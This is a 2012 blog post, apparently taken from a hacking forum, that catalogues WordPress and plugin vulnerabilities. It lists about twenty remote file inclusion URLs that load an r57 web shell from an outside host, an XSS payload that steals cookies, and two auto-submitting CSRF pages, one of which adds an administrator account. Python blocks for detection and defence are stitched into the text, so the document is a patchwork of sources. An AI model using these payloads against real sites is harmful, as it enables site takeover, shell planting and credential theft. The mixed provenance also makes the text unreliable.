Friday, 29 June 2012

WordPress Vulnerabilities + phpMyAdmin Secure

Well, I saw that you all gathered around this topic, so let me make one comment and then you can disperse. Joke, let's begin. You said WordPress. Even in WordPress there are RFI holes in the plugins. There are many holes; some WordPress XSS holes too. Let's start with RFI. You can find them in the plugins directory:

Code:
/plugins/links/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/polls/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/BlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/DeleteComment.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditIPofURL.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MTBlackList.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MassDelete.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MailAdmin.Action.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/MassDelTrackback.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditHeader.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/EditIP.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/IPofUrl.Examine.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/Import.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/spamx/LogView.Admin.class.php?_CONF[path]=http://creativerentacar.com/r57.txt?
/plugins/staticpages/functions.inc?_CONF[path]=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=http://creativerentacar.com/r57.txt?
/wp-content/plugins/myflash/myflash-button.php?wpPATH=http://creativerentacar.com/r57.txt?
/wordpress/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://creativerentacar.com/r57.txt?
/WordPress_Files/All_Users/wp-content/plugins/Enigma2.php?boarddir=http://creativerentacar.com/r57.txt?
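Every entry in that list has the same shape: a plugin include parameter carrying an absolute URL. As an added defensive example (not from the post), this Python scan flags that shape in access-log lines; it generalises beyond the four parameter names above to any query value that starts with a remote scheme or PHP stream wrapper. The log lines, hostnames and regex are constructed for the example.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Schemes an unguarded include() would happily fetch (assumption for the example).
REMOTE_SCHEMES = ("http://", "https://", "ftp://", "php://", "data:")
LOG_REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/')

def rfi_hits(log_line):
    """Return (parameter, value) pairs whose decoded value is a remote URL or wrapper."""
    m = LOG_REQUEST_RE.search(log_line)
    if not m:
        return []
    query = urlsplit(m.group(1)).query
    hits = []
    # keep_blank_values keeps "?param=" probes; parse_qsl URL-decodes the values
    for name, value in parse_qsl(query, keep_blank_values=True):
        if value.lower().startswith(REMOTE_SCHEMES):
            hits.append((name, value))
    return hits

def scan(log_text):
    """Map each offending line number (1-based) to its RFI-looking parameters."""
    findings = {}
    for lineno, line in enumerate(log_text.splitlines(), 1):
        hits = rfi_hits(line)
        if hits:
            findings[lineno] = hits
    return findings

# Constructed sample access-log lines (not real traffic): the first three mimic the
# request shapes in the list above, the last two are benign.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Jun/2012:10:01:02 +0300] "GET /plugins/links/functions.inc?_CONF[path]=http://attacker.example/r57.txt? HTTP/1.1" 200 512
203.0.113.5 - - [29/Jun/2012:10:01:03 +0300] "GET /wp-content/plugins/wordtube/wordtube-button.php?wpPATH=http%3A%2F%2Fattacker.example%2Fr57.txt%3F HTTP/1.1" 200 512
203.0.113.5 - - [29/Jun/2012:10:01:04 +0300] "GET /wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=HTTP://attacker.example/r57.txt? HTTP/1.1" 404 200
198.51.100.7 - - [29/Jun/2012:10:02:00 +0300] "GET /?s=http+servers HTTP/1.1" 200 1024
198.51.100.7 - - [29/Jun/2012:10:02:01 +0300] "GET /wp-login.php?redirect_to=%2Fwp-admin%2F HTTP/1.1" 200 1024
"""

if __name__ == "__main__":
    for lineno, hits in scan(SAMPLE_LOG).items():
        print(f"line {lineno}: {hits}")
```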
Then the abuse:
Code:
http://www.blogismi.com/wp-login.php?action=rp&key[]=
The reason for this:
Code:
if ( empty($key) )
Fix:
Code:
if ( empty( $key ) || is_array( $key ) )
That is, || means "or": reject the key if it is empty or, failing that, if it is an array, which is what is_array is there to catch.
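The point of the fix is that PHP turns `key[]=` into an array, and `empty()` is false for a non-empty array. As an added example (not WordPress code), this Python sketch models PHP's `$_GET` parsing and `empty()` semantics for the shapes that matter here, then runs the original check and the fixed check side by side; the function names are assumptions.

```python
from urllib.parse import unquote_plus

def parse_php_query(query):
    """Mimic PHP's $_GET parsing for the two shapes that matter here:
    'key=abc' gives a string, 'key[]=abc' gives a list (PHP array).
    Assumption for the example: nested keys like key[a][b] are not modelled."""
    params = {}
    for pair in query.split("&"):
        if not pair:
            continue
        name, _, value = pair.partition("=")
        name, value = unquote_plus(name), unquote_plus(value)
        if name.endswith("[]"):
            params.setdefault(name[:-2], []).append(value)
        else:
            params[name] = value
    return params

def php_empty(value):
    """PHP empty(): true for missing, '', '0', 0, None, False and an empty array."""
    return value in (None, "", "0", 0, False, [])

def vulnerable_key_check(params):
    """The original test: only empty($key) is rejected, so a non-empty array slips through."""
    key = params.get("key")
    return "invalid_key" if php_empty(key) else "lookup"

def fixed_key_check(params):
    """The fix: reject empty keys and anything that is not a plain string."""
    key = params.get("key")
    if php_empty(key) or isinstance(key, list):
        return "invalid_key"
    return "lookup"

if __name__ == "__main__":
    for q in ("action=rp&key=", "action=rp&key[]=", "action=rp&key=abc123"):
        p = parse_php_query(q)
        print(f"{q!r}: vulnerable={vulnerable_key_check(p)} fixed={fixed_key_check(p)}")
```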
Old XSS hole:
Code:
http://target.tld/wp-admin/post.php?action=delete&post='%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
Comment deleting:
Code:
http://target.tld/wp-admin/comment.php?action=
Check comment.php.
2.6.5 XSS (PoC)
Code:
PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&s=%27[XSS]
PoC: http://site/path/wp-admin/wpmu-blogs.php?action=blogs&ip_address=%27[XSS]
SQL hole:
Code:
http://www.exploit-db.com/exploits/18039/
You can read it from the link above )))
Directories look like this:

And before anything else, back up phpMyAdmin; for that, here is the download link for bigdump.php:
http://www.ozerov.de/bigdump.zip
And let's begin:
And that's how you take the backup. Back to our topic, the holes:
http://www.exploit-db.com/exploits/18276/
http://www.exploit-db.com/exploits/18330/
http://1337day.com/exploits/17326
http://www.exploit-db.com/exploits/18350/
http://www.exploit-db.com/exploits/18353/(Blind SQL O.o)
http://www.exploit-db.com/exploits/18355/

As you can see, you called WP the most secure; look what it has )))
And the CSRF in WordPress v3.3.1 is unbelievable. Here is what can be done with this CSRF:
Code:
# Add an admin
# Delete an admin
# Approve and delete comments
# Change the site title
# Change the admin e-mail and mess with the site address
Code:
<html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>WP 3.3.1 CSRF konu degistirme Author : Hptimi</H2>

 <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/admin-ajax.php">
 <input type="hidden" name="post_title" value="Hacked Bla bla...."/>
 <input type="hidden" name="post_name" value="Hacked hptimi blala...."/>
 <input type="hidden" name="mm" value="03"/>
 <input type="hidden" name="jj" value="16"/>

 <input type="hidden" name="aa" value="2012"/>
 <input type="hidden" name="hh" value=""/>
 <input type="hidden" name="mn" value=""/>
 <input type="hidden" name="ss" value=""/>
 <input type="hidden" name="post_author" value="1"/>
 <input type="hidden" name="post_password" value=""/>

 <input type="hidden" name="post_category%5B%5D" value="0"/>
 <input type="hidden" name="post_category%5B%5D" value="1"/>
 <input type="hidden" name="tax_input%5Bpost_tag%5D" value=""/>
 <input type="hidden" name="comment_status" value="open"/>
 <input type="hidden" name="ping_status" value="open"/>
 <input type="hidden" name="_status" value="publish"/>

 <input type="hidden" name="post_format" value="0"/>
 <input type="hidden" name="_inline_edit" value="<sniffed_value>"/>
 <input type="hidden" name="post_view" value="list"/>
 <input type="hidden" name="screen" value="edit-post"/>
 <input type="hidden" name="action" value="inline-save"/>

 <input type="hidden" name="post_type" value="post"/>
 <input type="hidden" name="post_ID" value="1"/>
 <input type="hidden" name="edit_date" value="true"/>
 <input type="hidden" name="post_status" value="all"/>
 </form>
 </body>

 </html>
Edit it with a URL decoder.
This one changes the post title. Adding an admin:
Code:
<html>
 <body onload="javascript:document.forms[0].submit()">
 <H2>WP 3.3.1 CSRF Admin ekleme Author : Hptimi</H2>

 <form method="POST" name="form0" action="http://<wordpress_ip>:80/wp-admin/user-new.php">
 <input type="hidden" name="action" value="createuser"/>
 <input type="hidden" name="_wpnonce_create-user" value="<sniffed_value>"/>
 <input type="hidden" name="_wp_http_referer" value="%2Fwordpress%2Fwp-admin%2Fuser-new.php"/>
 <input type="hidden" name="user_login" value="hptimi"/>

 <input type="hidden" name="email" value="admin@hptimi.com"/>
 <input type="hidden" name="first_name" value="admin@hptimi.com"/>
 <input type="hidden" name="last_name" value=""/>
 <input type="hidden" name="url" value=""/>
 <input type="hidden" name="pass1" value="password"/>
 <input type="hidden" name="pass2" value="password"/>

 <input type="hidden" name="role" value="administrator"/>
 <input type="hidden" name="createuser" value="Add+New+User+"/>
 </form>
 </body>
 </html>
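Both forms above ride on the victim's logged-in session, and both carry a `<sniffed_value>` field (`_inline_edit`, `_wpnonce_create-user`): that field is the per-user, per-action nonce WordPress checks, which is why the PoCs need it. As an added example (not WordPress code), this Python sketch models that server-side defence for the user-new.php form: an HMAC nonce bound to user, action and time window, plus a capability check. The secret, the 12-hour tick and the handler names are assumptions.

```python
import hmac, hashlib, time

# Assumptions for this example: a server-side secret, a 12-hour nonce window
# (WordPress likewise rotates nonces on a time tick) and a plain dict as the form.
SECRET = b"constructed-example-secret-do-not-reuse"
TICK_SECONDS = 12 * 3600

def make_nonce(user_id, action, secret=SECRET, now=None):
    """Bind the nonce to the user, the action and the current time window."""
    tick = int((now if now is not None else time.time()) // TICK_SECONDS)
    msg = f"{tick}|{action}|{user_id}".encode()
    return hmac.new(secret, msg, hashlib.sha256).hexdigest()[:20]

def verify_nonce(nonce, user_id, action, secret=SECRET, now=None):
    """Accept the current or the previous window; compare in constant time."""
    now = now if now is not None else time.time()
    for offset in (0, TICK_SECONDS):
        expected = make_nonce(user_id, action, secret, now - offset)
        if hmac.compare_digest(str(nonce), expected):
            return True
    return False

def handle_create_user(form, session_user, secret=SECRET, now=None):
    """Handler for the user-new.php form: a cross-site POST arrives with the
    victim's cookie but without a valid nonce, so it is refused."""
    uid, can_create_users = session_user
    if not can_create_users:
        return "forbidden: capability"
    if form.get("action") != "createuser":
        return "ignored"
    token = form.get("_wpnonce_create-user", "")
    if not verify_nonce(token, uid, "create-user", secret, now):
        return "forbidden: bad nonce"
    return f"created {form['user_login']} as {form['role']}"

if __name__ == "__main__":
    admin = (1, True)  # (user id, has create_users capability)
    forged = {"action": "createuser", "user_login": "newuser", "role": "administrator"}
    print(handle_create_user(forged, admin))
    legit = dict(forged, **{"_wpnonce_create-user": make_nonce(1, "create-user")})
    print(handle_create_user(legit, admin))
```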
There is no 100% secure & Respect! ^_^ Peace!
Topic: http://www.millikuvvetler.net/showthread.php?t=8539
